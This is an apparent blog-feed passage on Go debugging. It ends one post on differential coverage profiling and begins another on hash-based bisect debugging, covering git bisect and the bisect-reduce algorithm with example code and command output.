$ <b>go test -coverprofile=c1.prof -skip='TestAddSub$'</b>
PASS
coverage: 85.0% of statements
ok math/big 8.373s
% <b>go test -coverprofile=c2.prof -run='TestAddSub$'</b>
--- FAIL: TestAddSub (0.00s)
int_test.go:2020: addSub(-0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff, 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff) = -0x0, -0x1fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe, want 0x0, -0x1fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe
FAIL
coverage: 4.7% of statements
exit status 1
FAIL math/big 0.789s
$
</pre>
<p>
Now we can diff them to make a profile showing what’s unique about the failing test:
<pre>
$ <b>(head -1 c1.prof; diff c[12].prof | sed -n 's/^> //p') >c3.prof</b>
$ <b>go tool cover -html=c3.prof</b>
</pre>
<p>
The <code>head -1</code> is preserving the one-line coverage profile header. The <code>diff | sed</code> saves only the lines unique to the failing test’s profile, and the <code>go tool cover -html</code> opens the profile in a web browser.
<p>
In the resulting profile, “covered” (green) means it ran in the failing test but not the passing ones, making it something to take a closer look at.
Looking at the file list, only <code>natmul.go</code> has a non-zero coverage percentage, meaning it contains lines that are unique to the failing test.
<p>
<img name="diffcover2" class="center pad" width=627 height=653 src="diffcover2.png" srcset="diffcover2.png 1x, diffcover2@1.5x.png 1.5x, diffcover2@2x.png 2x">
<p>
If we open <code>natmul.go</code>, we can see various lines in red (“uncovered”).
<p>
<img name="diffcover3" class="center pad" width=659 height=583 src="diffcover3.png" srcset="diffcover3.png 1x, diffcover3@1.5x.png 1.5x, diffcover3@2x.png 2x">
<p>
These lines ran in passing tests but not in the failing test. They are exonerated, although the fact that the lines normally run but were skipped in the failing test may prompt useful questions about what logic led to them being skipped. In this case, it’s just that the test does not exercise them: the <code>nat.mul</code> method has not been called at all.
<p>
Scrolling down, we find the one section of green.
<p>
<img name="diffcover4" class="center pad" width=762 height=893 src="diffcover4.png" srcset="diffcover4.png 1x, diffcover4@1.5x.png 1.5x, diffcover4@2x.png 2x">
<p>
This code is where I inserted the bug: the <code>else</code> branch is missing <code>za.neg = false</code>, producing the <code>-0x0</code> in the test failure.
Differential coverage is cheap to compute and display, and when it’s right, it can save a lot of time.
Out of over 15,000 lines of code, differential coverage identified 10, including the two relevant ones.
<p>
Of course, this technique is not foolproof: a passing test can still execute buggy code if the
bug is data-dependent, or if the test is not sensitive to the specific mistake in the code.
But a lot of the time, buggy code only triggers failures.
In those cases, differential coverage pinpoints the code blocks that merit a closer look.
<p>
You can <a href="bigcover.html">see the full profile here</a>.
<p>
A simpler but still useful technique is to view the basic coverage profile for a single failing test.
That gives you an accurate picture of which sections of code ran in the test, which can guide your
debugging: code that didn’t run is not the problem.
And if you are confused about how exactly a particular function returned an error,
the coverage pinpoints the exact error line.
In the example above, the failing test covered only 4.7% of the code.
<p>
Differential coverage also works for passing tests. Want to find the <a href="httpcover.html">code that implements the SOCK5 proxy in net/http</a>?
<pre>
$ <b>go test -short -skip=SOCKS5 -coverprofile=c1.prof net/http</b>
$ <b>go test -short -run=SOCKS5 -coverprofile=c2.prof net/http</b>
$ <b>(head -1 c1.prof; diff c[12].prof | sed -n 's/^> //p') >c3.prof</b>
$ <b>go tool cover -html=c3.prof</b>
</pre>
<p>
Have fun!
Hash-Based Bisect Debugging in Compilers and Runtimestag:research.swtch.com,2012:research.swtch.com/bisect2024-07-18T10:18:53-04:002024-07-18T10:20:53-04:00Binary search over program code or execution to find why a new library or compiler causes a failure.<style>
blockquote {
padding-left: 0.5em;
border-left-style: solid;
border-left-width: 4px;
border-left-color: #ccf;
}
</style>
<a class=anchor href="#setting_the_stage"><h2 id="setting_the_stage">Setting the Stage</h2></a>
<p>
Does this sound familar?
You make a change to a library to optimize its performance
or clean up technical debt
or fix a bug,
only to get a bug report:
some very large, incomprehensibly opaque test
is now failing.
Or you add a new compiler optimization with a similar result.
Now you have a major debugging job
in an unfamiliar code base.
<p>
What if I told you that a magic wand exists
that can pinpoint the relevant line of code or call stack
in that unfamiliar code base?
It exists.
It is a real tool, and I’m going to show it to you.
This description might seem a bit over the top,
but every time I use this tool, it really does feel like magic.
Not just any magic either, but the best kind of magic:
delightful to watch even when you know exactly how it works.
<a class=anchor href="#binary_search_and_bisecting_data"><h2 id="binary_search_and_bisecting_data">Binary Search and Bisecting Data</h2></a>
<p>
Before we get to the new trick, let’s take a look at some
simpler, older tricks.
Every good magician starts with mastery of the basic techniques.
In our case, that technique is binary search.
Most presentations of binary search talk about
finding an item in a sorted list,
but there are far more interesting uses.
Here is an example I wrote long ago for Go’s <a href="https://go.dev/pkg/sort/#Search"><code>sort.Search</code></a> documentation:
<pre>func GuessingGame() {
var s string
fmt.Printf("Pick an integer from 0 to 100.\n")
answer := sort.Search(100, func(i int) bool {
fmt.Printf("Is your number <= %d? ", i)
fmt.Scanf("%s", &s)
return s != "" && s[0] == 'y'
})
fmt.Printf("Your number is %d.\n", answer)
}
</pre>
<p>
If we run this code, it plays a guessing game with us:
<pre>% go run guess.go
Pick an integer from 0 to 100.
Is your number <= 50? y
Is your number <= 25? n
Is your number <= 38? y
Is your number <= 32? y
Is your number <= 29? n
Is your number <= 31? n
Your number is 32.
%
</pre>
<p>
The same guessing game can be applied to debugging.
In his <i>Programming Pearls</i> column titled “Aha! Algorithms”
in <i>Communications of the ACM</i> (September 1983),
Jon Bentley called binary search “a solution that looks for problems.”
Here’s one of his examples:<blockquote>
<p>
Roy Weil applied the technique [binary search]
in cleaning a deck of about a thousand punched cards that contained a single bad card.
Unfortunately the bad card wasn’t known by sight; it could only be identified by running
some subset of the cards through a program and seeing a wildly erroneous answer—this
process took several minutes. His predecessors at the task tried to solve it by running a
few cards at a time through the program, and were making steady (but slow)
progress toward a solution. How did Weil find the culprit in just ten runs of the program?</blockquote>
<p>
Obviously, Weil played the guessing game using binary search.
Is the bad card in the first 500? Yes. The first 250? No. And so on.
This is the earliest published description of debugging by binary search
that I have been able to find.
In this case, it was for debugging data.
<a class=anchor href="#bisecting_version_history"><h2 id="bisecting_version_history">Bisecting Version History</h2></a>
<p>
We can apply binary search to a program’s version history instead of data.
Every time we notice a new bug in an old program,
we play the guessing game “when did this program last work?”
<ul>
<li>
Did it work 50 days ago? Yes.
<li>
Did it work 25 days ago? No.
<li>
Did it work 38 days ago? Yes.</ul>
<p>
And so on,
until we find that the program last worked correctly 32 days ago,
meaning the bug was introduced 31 days ago.
<p>
Debugging through time with binary search is a very old trick,
independently discovered many times by many people.
For example, we could play the guessing game using
commands like
<code>cvs checkout -D '31 days ago'</code>
or Plan 9’s <a href="https://9fans.github.io/plan9port/man/man1/yesterday.html">more musical</a>
<code>yesterday -n 31</code>.
To some programmers, the techniques of using binary search
to debug data or debug through time seem
“<a href="https://groups.google.com/g/comp.compilers/c/vGh4s3HBQ-s/m/qmrVKmF5AgAJ">so basic that there is no need to write them down</a>.”
But writing a trick down is the first step to making sure everyone can do it:
magic tricks can be basic but not obvious.
In software, writing a trick down is also the first step to automating it and building good tools.
<p>
In the late-1990s, the idea of binary search over version history
was <a href="https://groups.google.com/g/comp.compilers/c/vGh4s3HBQ-s/m/Chvpu7vTAgAJ">written down at least twice</a>.
Brian Ness and Viet Ngo published
“<a href="https://ieeexplore.ieee.org/abstract/document/625082">Regression containment through source change isolation</a>” at COMPSAC ’97 (August 1997)
describing a system built at Cray Research that they used to deliver much more frequent non-regressing compiler releases.
Independently, Larry McVoy published a file “<a href="https://elixir.bootlin.com/linux/1.3.73/source/Documentation/BUG-HUNTING">Documentation/BUG-HUNTING</a>” in the Linux 1.3.73 release (March 1996).
He captured how magical it feels that the trick works even if you have no particular expertise in the code being tested:<blockquote>
<p>
This is how to track down a bug if you know nothing about kernel hacking.
It’s a brute force approach but it works pretty well. <br>
<br>
You need:
<ul>
<li>
A reproducible bug - it has to happen predictably (sorry)
<li>
All the kernel tar files from a revision that worked to the revision that doesn’t</ul>
<p>
You will then do:
<ul>
<li>
Rebuild a revision that you believe works, install, and verify that.
<li>
Do a binary search over the kernels to figure out which one
introduced the bug. I.e., suppose 1.3.28 didn’t have the bug, but
you know that 1.3.69 does. Pick a kernel in the middle and build
that, like 1.3.50. Build & test; if it works, pick the mid point
between .50 and .69, else the mid point between .28 and .50.
<li>
You’ll narrow it down to the kernel that introduced the bug. You
can probably do better than this but it gets tricky.</ul>
<p>
. . . <br>
<br>
My apologies to Linus and the other kernel hackers for describing this
brute force approach, it’s hardly what a kernel hacker would do. However,
it does work and it lets non-hackers help bug fix. And it is cool
because Linux snapshots will let you do this - something that you can’t
do with vender supplied releases.</blockquote>
<p>
Later, Larry McVoy created Bitkeeper,
which Linux used as its first source control system.
Bitkeeper provided a way to print the longest straight line
of changes through the directed acyclic graph of commits,
providing a more fine-grained timeline for binary search.
When Linus Torvalds created Git, he carried that idea forward
as <a href="https://github.com/git/git/commit/8b3a1e056f2107deedfdada86046971c9ad7bb87"><code>git rev-list --bisect</code></a>, which
enabled the same kind of manual binary search.
A few days after adding it, he <a href="https://groups.google.com/g/fa.linux.kernel/c/N4CqlNCvFCY/m/ItQoFhVZyJgJ">explained how to use it</a> on the Linux kernel mailing list:<blockquote>
<p>
Hmm.. Since you seem to be a git user, maybe you could try the git
"bisect" thing to help narrow down exactly where this happened (and help
test that thing too ;). <br>
<br>
You can basically use git to find the half-way point between a set of
"known good" points and a "known bad" point ("bisecting" the set of
commits), and doing just a few of those should give us a much better view
of where things started going wrong. <br>
<br>
For example, since you know that 2.6.12-rc3 is good, and 2.6.12 is bad,
you’d do <br>
<br>
git-rev-list --bisect v2.6.12 ^v2.6.12-rc3 <br>
<br>
where the "v2.6.12 ^v2.6.12-rc3" thing basically means "everything in
v2.6.12 but _not_ in v2.6.12-rc3" (that’s what the ^ marks), and the
"--bisect" flag just asks git-rev-list to list the middle-most commit,
rather than all the commits in between those kernel versions.</blockquote>
<p>
This response started a <a href="https://groups.google.com/g/fa.linux.kernel/c/cp6abJnEN5U/m/5Z5s14LkzR4J">separate discussion</a>
about making the process easier, which led eventually to the
<a href="https://git-scm.com/docs/git-bisect"><code>git bisect</code></a> tool that exists today.
<p>
Here’s an example. We tried updating to a newer version of Go
and found that a test fails.
We can use <code>git bisect</code> to pinpoint the specific commit that caused the failure:
<p>
<pre>% git bisect start master go1.21.0
Previous HEAD position was 3b8b550a35 doc: document run..
Switched to branch 'master'
Your branch is ahead of 'origin/master' by 5 commits.
Bisecting: a merge base must be tested
[2639a17f146cc7df0778298c6039156d7ca68202] doc: run rel...
% git bisect run sh -c '
git clean -df
cd src
./make.bash || exit 125
cd $HOME/src/rsc.io/tmp/timertest/retry
go list || exit 0
go test -count=5
'
</pre>
<p>
It takes some care to write a correct <code>git bisect</code> invocation,
but once you get it right, you can walk away while <code>git bisect</code>
works its magic.
In this case, the script we pass to <code>git bisect run</code> cleans out any stale files
and then builds the Go toolchain (<code>./make.bash</code>).
If that step fails, it exits with code 125,
a special inconclusive answer for <code>git bisect</code>:
something else is wrong with this commit and we can’t say
whether or not the bug we’re looking for is present.
Otherwise it changes into the directory of the failing test.
If <code>go list</code> fails, which happens if the bisect uses a version of Go that’s too old,
the script exits successfully, indicating that the bug is not present.
Otherwise the script runs <code>go test</code> and exits with the
status from that command. The <code>-count=5</code> is there because
this is a flaky failure that does not always happen: running five times
is enough to make sure we observe the bug if it is present.
<p>
When we run this command, <code>git bisect</code> prints a lot of output,
along with the output of our test script,
to make sure we can see the progress:
<pre>% git bisect run ...
...
go: download go1.23 for darwin/arm64: toolchain not available
Bisecting: 1360 revisions left to test after this (roughly 10 steps)
[752379113b7c3e2170f790ec8b26d590defc71d1]
runtime/race: update race syso for PPC64LE
...
go: download go1.23 for darwin/arm64: toolchain not available
Bisecting: 680 revisions left to test after this (roughly 9 steps)
[ff8a2c0ad982ed96aeac42f0c825219752e5d2f6]
go/types: generate mono.go from types2 source
...
ok rsc.io/tmp/timertest/retry 10.142s
Bisecting: 340 revisions left to test after this (roughly 8 steps)
[97f1b76b4ba3072ab50d0d248fdce56e73b45baf]
runtime: optimize timers.cleanHead
...
FAIL rsc.io/tmp/timertest/retry 22.136s
Bisecting: 169 revisions left to test after this (roughly 7 steps)
[80157f4cff014abb418004c0892f4fe48ee8db2e]
io: close PipeReader in test
...
ok rsc.io/tmp/timertest/retry 10.145s
Bisecting: 84 revisions left to test after this (roughly 6 steps)
[8f7df2256e271c8d8d170791c6cd90ba9cc69f5e]
internal/asan: match runtime.asan{read,write} len parameter type
...
FAIL rsc.io/tmp/timertest/retry 20.148s
Bisecting: 42 revisions left to test after this (roughly 5 steps)
[c9ed561db438ba413ba8cfac0c292a615bda45a8]
debug/elf: avoid using binary.Read() in NewFile()
...
FAIL rsc.io/tmp/timertest/retry 14.146s
Bisecting: 20 revisions left to test after this (roughly 4 steps)
[2965dc989530e1f52d80408503be24ad2582871b]
runtime: fix lost sleep causing TestZeroTimer flakes
...
FAIL rsc.io/tmp/timertest/retry 18.152s
Bisecting: 10 revisions left to test after this (roughly 3 steps)
[b2e9221089f37400f309637b205f21af7dcb063b]
runtime: fix another lock ordering problem
...
ok rsc.io/tmp/timertest/retry 10.142s
Bisecting: 5 revisions left to test after this (roughly 3 steps)
[418e6d559e80e9d53e4a4c94656e8fb4bf72b343]
os,internal/godebugs: add missing IncNonDefault calls
...
ok rsc.io/tmp/timertest/retry 10.163s
Bisecting: 2 revisions left to test after this (roughly 2 steps)
[6133c1e4e202af2b2a6d4873d5a28ea3438e5554]
internal/trace/v2: support old trace format
...
FAIL rsc.io/tmp/timertest/retry 22.164s
Bisecting: 0 revisions left to test after this (roughly 1 step)
[508bb17edd04479622fad263cd702deac1c49157]
time: garbage collect unstopped Tickers and Timers
...
FAIL rsc.io/tmp/timertest/retry 16.159s
Bisecting: 0 revisions left to test after this (roughly 0 steps)
[74a0e3160d969fac27a65cd79a76214f6d1abbf5]
time: clean up benchmarks
...
ok rsc.io/tmp/timertest/retry 10.147s
508bb17edd04479622fad263cd702deac1c49157 is the first bad commit
commit 508bb17edd04479622fad263cd702deac1c49157
Author: Russ Cox <rsc@golang.org>
AuthorDate: Wed Feb 14 20:36:47 2024 -0500
Commit: Russ Cox <rsc@golang.org>
CommitDate: Wed Mar 13 21:36:04 2024 +0000
time: garbage collect unstopped Tickers and Timers
...
This CL adds an undocumented GODEBUG asynctimerchan=1
that will disable the change. The documentation happens in
the CL 568341.
...
bisect found first bad commit
%
</pre>
<p>
This bug appears to be caused by my new
garbage-collection-friendly timer implementation that will be in Go 1.23.
<i>Abracadabra!</i>
<a class=anchor href="#new_trick"><h2 id="new_trick">A New Trick: Bisecting Program Locations</h2></a>
<p>
The culprit commit that <code>git bisect</code> identified is a significant change to the timer
implementation.
I anticipated that it might cause subtle test failures,
so I included a <a href="https://go.dev/doc/godebug">GODEBUG setting</a>
to toggle between the old implementation and the new one.
Sure enough, toggling it makes the bug disappear:
<pre>% GODEBUG=asynctimerchan=1 go test -count=5 # old
PASS
ok rsc.io/tmp/timertest/retry 10.117s
% GODEBUG=asynctimerchan=0 go test -count=5 # new
--- FAIL: TestDo (4.00s)
...
--- FAIL: TestDo (6.00s)
...
--- FAIL: TestDo (4.00s)
...
FAIL rsc.io/tmp/timertest/retry 18.133s
%
</pre>
<p>
Knowing which commit caused a bug, along with minimal information
about the failure, is often enough to help identify the mistake.
But what if it’s not?
What if the test is large and complicated and entirely code you’ve never seen before,
and it fails in some inscrutable way that doesn’t seem to have anything
to do with your change?
When you work on compilers or low-level libraries, this happens quite often.
For that, we have a new magic trick: bisecting program locations.
<p>
That is, we can run binary search on a different axis: over the <i>program’s code</i>, not its version history.
We’ve implemented this search in a new tool unimaginatively named <code>bisect</code>.
When applied to library function behavior like the timer change,
<code>bisect</code> can search over all stack traces leading to the new code,
enabling the new code for some stacks and disabling it for others.
By repeated execution, it can narrow the failure down to enabling
the code only for one specific stack:
<pre>% go install golang.org/x/tools/cmd/bisect@latest
% bisect -godebug asynctimerchan=1 go test -count=5
...
bisect: FOUND failing change set
--- change set #1 (disabling changes causes failure)
internal/godebug.(*Setting).Value()
/Users/rsc/go/src/internal/godebug/godebug.go:165
time.syncTimer()
/Users/rsc/go/src/time/sleep.go:25
time.NewTimer()
/Users/rsc/go/src/time/sleep.go:145
time.After()
/Users/rsc/go/src/time/sleep.go:203
rsc.io/tmp/timertest/retry.Do()
/Users/rsc/src/rsc.io/tmp/timertest/retry/retry.go:37
rsc.io/tmp/timertest/retry.TestDo()
/Users/rsc/src/rsc.io/tmp/timertest/retry/retry_test.go:63
</pre>
<p>
Here the <code>bisect</code> tool is reporting that disabling <code>asynctimerchan=1</code>
(that is, enabling the new implementation)
only for this one call stack suffices to provoke the test failure.
<p>
One of the hardest things about debugging is running a program
backward: there’s a data structure with a bad value,
or the control flow has zigged instead of zagged,
and it’s very difficult to understand how it could have gotten
into that state.
In contrast, this <code>bisect</code> tool is showing the stack at the moment
just <i>before</i> things go wrong:
the stack identifies the critical decision point that determines whether the
test passes or fails.
In contrast to puzzling backward,
it is usually easy to look forward
in the program execution to understand why this
specific decision would matter.
Also, in an enormous code base, the bisection has
identified the specific few lines where we should start debugging.
We can read the code responsible for that specific sequence of calls
and look into why the new timers would change the
code’s behavior.
<p>
When you are working on a compiler or runtime and cause
a test failure in an enormous, unfamiliar code base,
and then this <code>bisect</code> tool narrows down the cause to
a few specific lines of code, it is truly a magical experience.
<p>
The rest of this post explains the inner workings of
this <code>bisect</code> tool, which Keith Randall, David Chase, and I
developed and refined over the past decade of work on Go.
Other people and projects have realized the idea of
bisecting program locations too:
I am not claiming that we were the first to discover it.
However, I think we have developed the approach further
and systematized it more than others.
This post documents what we’ve
learned, so that others can build on our efforts rather than rediscover them.
<a class=anchor href="#example"><h2 id="example">Example: Bisecting Function Optimization</h2></a>
<p>
Let’s start with a simple example and work back up to stack traces.
Suppose we are working on a compiler and know that a test program
fails only when compiled with optimizations enabled.
We could make a list of all the functions in the program
and then try disabling optimization of functions one at a time
until we find a minimal set of functions (probably just one) whose
optimization triggers the bug.
Unsurprisingly, we can speed up that process
using binary search:
<ol>
<li>
Change the compiler to print a list of every function it considers for optimization.
<li>
Change the compiler to accept a list of functions where optimization is allowed.
Passing it an empty list (optimize no functions) should make the test pass,
while passing the complete list (optimize all functions) should make the test fail.
<li>
Use binary search to determine the shortest list prefix
that can be passed to the compiler to make the test fail.
The last function in that list prefix is one that must be optimized
for the test to fail
(but perhaps not the only one).
<li>
Forcing that function to always be optimized, we can repeat
the process to find any other functions that must also be
optimized to provoke the bug.</ol>
<p>
For example, suppose there are ten functions in the program
and we run these three binary search trials:
<p>
<img name="hashbisect0func" class="center pad" width=197 height=238 src="hashbisect0func.png" srcset="hashbisect0func.png 1x, hashbisect0func@1.5x.png 1.5x, hashbisect0func@2x.png 2x, hashbisect0func@3x.png 3x, hashbisect0func@4x.png 4x">
<p>
When we optimize the first 5 functions, the test passes. 7? fail. 6? still pass.
This tells us that the seventh function, <code>sin</code>, is one function that must
be optimized to provoke the failure.
More precisely, with <code>sin</code> optimized, we know that
no functions later in the list need to be optimized,
but we don’t know whether any of functions earlier in the list must also be optimized.
To check the earlier locations, we can run another binary search
over the other remaining six list entries, always adding <code>sin</code> as well:
<p>
<img name="hashbisect0funcstep2" class="center pad" width=218 height=180 src="hashbisect0funcstep2.png" srcset="hashbisect0funcstep2.png 1x, hashbisect0funcstep2@1.5x.png 1.5x, hashbisect0funcstep2@2x.png 2x, hashbisect0funcstep2@3x.png 3x, hashbisect0funcstep2@4x.png 4x">
<p>
This time, optimizing the first two (plus the hard-wired <code>sin</code>) fails,
but optimizing the first one passes,
indicating that <code>cos</code> must also be optimized.
Then we have just one suspect location left: <code>add</code>.
A binary search over that one-entry list (plus the two hard-wired <code>cos</code> and <code>sin</code>)
shows that <code>add</code> can be left off the list without losing the failure.
<p>
Now we know the answer: one locally minimal set of functions to optimize to cause
the test failure is <code>cos</code> and <code>sin</code>.
By locally minimal, I mean that removing any function from the set
makes the test failure disappear: optimizing <code>cos</code> or <code>sin</code> by itself is not enough.
However, the set may still not be globally minimal:
perhaps optimizing only <code>tan</code> would cause a different failure (or not).
<p>
It might be tempting to run the search more like a
traditional binary search, cutting the list being searched in half at each step.
That is, after confirming that the
program passes when optimizing the first half,
we might consider discarding that half of the list and continuing the binary search on the other half.
Applied to our example, that algorithm would run like this:
<p>
<img name="hashbisect0funcbad" class="center pad" width=290 height=237 src="hashbisect0funcbad.png" srcset="hashbisect0funcbad.png 1x, hashbisect0funcbad@1.5x.png 1.5x, hashbisect0funcbad@2x.png 2x, hashbisect0funcbad@3x.png 3x, hashbisect0funcbad@4x.png 4x">
<p>
The first trial passing would suggest the incorrect optimization is in the second
half of the list, so we discard the first half.
But now <code>cos</code> is never optimized (it just got discarded),
so all future trials pass too,
leading to a contradiction: we lost track of the way to make the program fail.
The problem is that discarding part of the list is only justified if we know that part doesn’t matter.
That’s only true if the bug is caused by optimizing a single function,
which may be likely but is not guaranteed.
If the bug only manifests when optimizing multiple functions at once,
discarding half the list discards the failure.
That’s why the binary search must in general be over list prefix lengths, not list subsections.
<a class=anchor href="#bisect-reduce"><h2 id="bisect-reduce">Bisect-Reduce</h2></a>
<p>
The “repeated binary search” algorithm we just looked at does work,
but the need for the repetition suggests that binary search may not
be the right core algorithm. Here is a more direct algorithm,
which I’ll call the “bisect-reduce” algorithm, since it is a
bisection-based reduction.
<p>
For simplicity, let’s assume we have a global function <code>buggy</code>
that reports whether the bug is triggered when our change is
enabled at the given list of locations:
<pre>// buggy reports whether the bug is triggered
// by enabling the change at the listed locations.
func buggy(locations []string) bool
</pre>
<p>
<code>BisectReduce</code> takes a single input list <code>targets</code> for which
<code>buggy(targets)</code> is true and returns a locally minimal subset <code>x</code>
for which <code>buggy(x)</code> remains true. It invokes a more generalized
helper <code>bisect</code>, which takes an additional argument: a <code>forced</code>
list of locations to keep enabled during the reduction.
<pre>// BisectReduce returns a locally minimal subset x of targets
// where buggy(x) is true, assuming that buggy(targets) is true.
func BisectReduce(targets []string) []string {
return bisect(targets, []string{})
}
// bisect returns a locally minimal subset x of targets
// where buggy(x+forced) is true, assuming that
// buggy(targets+forced) is true.
//
// Precondition: buggy(targets+forced) = true.
//
// Postcondition: buggy(result+forced) = true,
// and buggy(x+forced) = false for any x ⊂ result.
func bisect(targets []string, forced []string) []string {
if len(targets) == 0 || buggy(forced) {
// Targets are not needed at all.
return []string{}
}
if len(targets) == 1 {
// Reduced list to a single required entry.
return []string{targets[0]}
}
// Split targets in half and reduce each side separately.
m := len(targets)/2
left, right := targets[:m], targets[m:]
leftReduced := bisect(left, slices.Concat(right, forced))
rightReduced := bisect(right, slices.Concat(leftReduced, forced))
return slices.Concat(leftReduced, rightReduced)
}
</pre>
<p>
Like any good divide-and-conquer algorithm, a few lines do quite a lot:
<ul>
<li>
<p>
If the target list has been reduced to nothing,
or if <code>buggy(forced)</code> (without any targets) is true,
then we can return an empty list.
Otherwise we know something from targets is needed.
<li>
<p>
If the target list is a single entry, that entry is what’s needed:
we can return a single-element list.
<li>
<p>
Otherwise, the recursive case: split the target list in half
and reduce each side separately. Note that it is important to
force <code>leftReduced</code> (not <code>left</code>) while reducing <code>right</code>.</ul>
<p>
Applied to the function optimization example, <code>BisectReduce</code> would end up at a
call to
<pre>bisect([add cos div exp mod mul sin sqr sub tan], [])
</pre>
<p>
which would split the targets list into
<pre>left = [add cos div exp mod]
right = [mul sin sqr sub tan]
</pre>
<p>
The recursive calls compute:
<pre>bisect([add cos div exp mod], [mul sin sqr sub tan]) = [cos]
bisect([mul sin sqr sub tan], [cos]) = [sin]
</pre>
<p>
Then the <code>return</code> puts the two halves together: <code>[cos sin]</code>.
<p>
The version of <code>BisectReduce</code> we have been considering is the shortest
one I know; let’s call it the “short algorithm”.
A longer version handles the “easy” case of the bug being
contained in one half before the “hard” one of needing
parts of both halves.
Let’s call it the “easy/hard algorithm”:
<pre>// BisectReduce returns a locally minimal subset x of targets
// where buggy(x) is true, assuming that buggy(targets) is true.
func BisectReduce(targets []string) []string {
if len(targets) == 0 || buggy(nil) {
return nil
}
return bisect(targets, []string{})
}
// bisect returns a locally minimal subset x of targets
// where buggy(x+forced) is true, assuming that
// buggy(targets+forced) is true.
//
// Precondition: buggy(targets+forced) = true,
// and buggy(forced) = false.
//
// Postcondition: buggy(result+forced) = true,
// and buggy(x+forced) = false for any x ⊂ result.
// Also, if there are any valid single-element results,
// then bisect returns one of them.
func bisect(targets []string, forced []string) []string {
if len(targets) == 1 {
// Reduced list to a single required entry.
return []string{targets[0]}
}
// Split targets in half.
m := len(targets)/2
left, right := targets[:m], targets[m:]
// If either half is sufficient by itself, focus there.
if buggy(slices.Concat(left, forced)) {
return bisect(left, forced)
}
if buggy(slices.Concat(right, forced)) {
return bisect(right, forced)
}
// Otherwise need parts of both halves.
leftReduced := bisect(left, slices.Concat(right, forced))
rightReduced := bisect(right, slices.Concat(leftReduced, forced))
return slices.Concat(leftReduced, rightReduced)
}
</pre>
<p>
The easy/hard algorithm has two benefits and one drawback compared to the short algorithm.
<p>
One benefit is that the easy/hard algorithm more directly maps to our intuitions
about what bisecting should do:
try one side, try the other, fall back to some combination of both sides.
In contrast, the short algorithm always relies on the general case
and is harder to understand.
<p>
Another benefit of the easy/hard algorithm is that
it guarantees to find a single-culprit answer when one exists.
Since most bugs can be reduced to a single culprit,
guaranteeing to find one when one exists makes for
easier debugging sessions.
Supposing that optimizing <code>tan</code> would have triggered
the test failure,
the easy/hard algorithm would try
<pre>buggy([add cos div exp mod]) = false // left
buggy([mul sin sqr sub tan]) = true // right
</pre>
<p>
and then would discard the left side, focusing on the right side
and eventually finding <code>[tan]</code>, instead of <code>[sin cos]</code>.
<p>
The drawback is that because the easy/hard algorithm doesn’t often rely
on the general case, the general case needs more careful testing
and is easier to get wrong without noticing.
For example, Andreas Zeller’s 1999 paper
“<a href="https://dl.acm.org/doi/10.1145/318774.318946">Yesterday, my program worked. Today, it does not. Why?</a>”
gives what should be the easy/hard version of the bisect-reduce algorithm
as a way to bisect over independent program changes,
except that the algorithm has a bug:
in the “hard” case, the <code>right</code> bisection forces <code>left</code> instead of <code>leftReduced</code>.
The result is that if there are two culprit pairs crossing
the <code>left</code>/<code>right</code> boundary, the reductions can
choose one culprit from each pair instead of a matched pair.
Simple test cases are all handled by the easy case, masking the bug.
In contrast, if we insert the same bug into the general case of the short algorithm,
very simple test cases fail.
<p>
Real implementations are better served by the easy/hard algorithm,
but they must take care to implement it correctly.
<a class=anchor href="#list-based_bisect-reduce"><h2 id="list-based_bisect-reduce">List-Based Bisect-Reduce</h2></a>
<p>
Having established the algorithm, let’s now turn to
the details of hooking it up to a compiler.
Exactly how do we obtain the list of source locations,
and how do we feed it back into the compiler?
<p>
The most direct answer is to implement one debug mode
that prints the full list of locations for the optimization
in question
and another debug mode that accepts a list
indicating where the optimization is permitted.
<a href="https://bernsteinbear.com/blog/cinder-jit-bisect/">Meta’s Cinder JIT for Python</a>,
published in 2021,
takes this approach for deciding which functions to compile with the JIT
(as opposed to interpret).
Its <a href="https://github.com/facebookincubator/cinder/blob/cinder/3.10/Tools/scripts/jitlist_bisect.py"><code>Tools/scripts/jitlist_bisect.py</code></a>
is the earliest correct published version of the bisect-reduce algorithm
that I’m aware of,
using the easy/hard form.
<p>
The only downside to this approach is the potential size of the lists,
especially since bisect debugging is critical for reducing
failures in very large programs.
If there is some way to reduce the amount of data that must be
sent back to the compiler on each iteration, that would be helpful.
In complex build systems, the function lists may be too large
to pass on the command line or in an environment variable,
and it may be difficult or even impossible to arrange for a new input file
to be passed to every compiler invocation.
An approach that can specify the target list as a short command line argument
will be easier to use in practice.
<a class=anchor href="#counter-based_bisect-reduce"><h2 id="counter-based_bisect-reduce">Counter-Based Bisect-Reduce</h2></a>
<p>
Java’s HotSpot C2 just-in-time (JIT) compiler provided a
debug mechanism to control which functions to compile with the JIT,
but instead of using an explicit list of functions like in Cinder,
HotSpot numbered the functions as it considered them.
The compiler flags <code>-XX:CIStart</code> and <code>-XX:CIStop</code> set the
range of function numbers that were eligible to be compiled.
Those flags are
<a href="https://github.com/openjdk/jdk/blob/151ef5d4d261c9fc740d3ccd64a70d3b9ccc1ab5/src/hotspot/share/compiler/compileBroker.cpp#L1569">still present today (in debug builds)</a>,
and you can find uses of them in
<a href="https://bugs.java.com/bugdatabase/view_bug?bug_id=4311720">Java bug reports dating back at least to early 2000</a>.
<p>
There are at least two limitations to numbering functions.
<p>
The first limitation is minor and easily fixed:
allowing only a single contiguous range
enables binary search for a single culprit but
not the general bisect-reduce for multiple culprits.
To enable bisect-reduce, it would suffice
to accept a list of integer ranges, like <code>-XX:CIAllow=1-5,7-10,12,15</code>.
<p>
The second limitation is more serious:
it can be difficult to keep the numbering stable from run to run.
Implementation strategies like compiling functions in parallel
might mean considering functions in varying orders based
on thread interleaving.
In the context of a JIT, even threaded runtime execution
might change the order that functions are considered for compilation.
Twenty-five years ago, threads were rarely used and this limitation may not have been
much of a problem.
Today, assuming a consistent function numbering is a show-stopper.
<a class=anchor href="#hash-based_bisect-reduce"><h2 id="hash-based_bisect-reduce">Hash-Based Bisect-Reduce</h2></a>
<p>
A different way to keep the location list implicit is to
hash each location to a (random-looking) integer and then
use bit suffixes to identify sets of locations.
The hash computation does not depend on the sequence
in which the source locations are encountered,
making hashing compatible with
parallel compilation, thread interleaving, and so on.
The hashes effectively arrange the functions
into a binary tree:
<p>
<img name="hashbisect1" class="center pad" width=817 height=411 src="hashbisect1.png" srcset="hashbisect1.png 1x, hashbisect1@1.5x.png 1.5x, hashbisect1@2x.png 2x, hashbisect1@3x.png 3x">
<p>
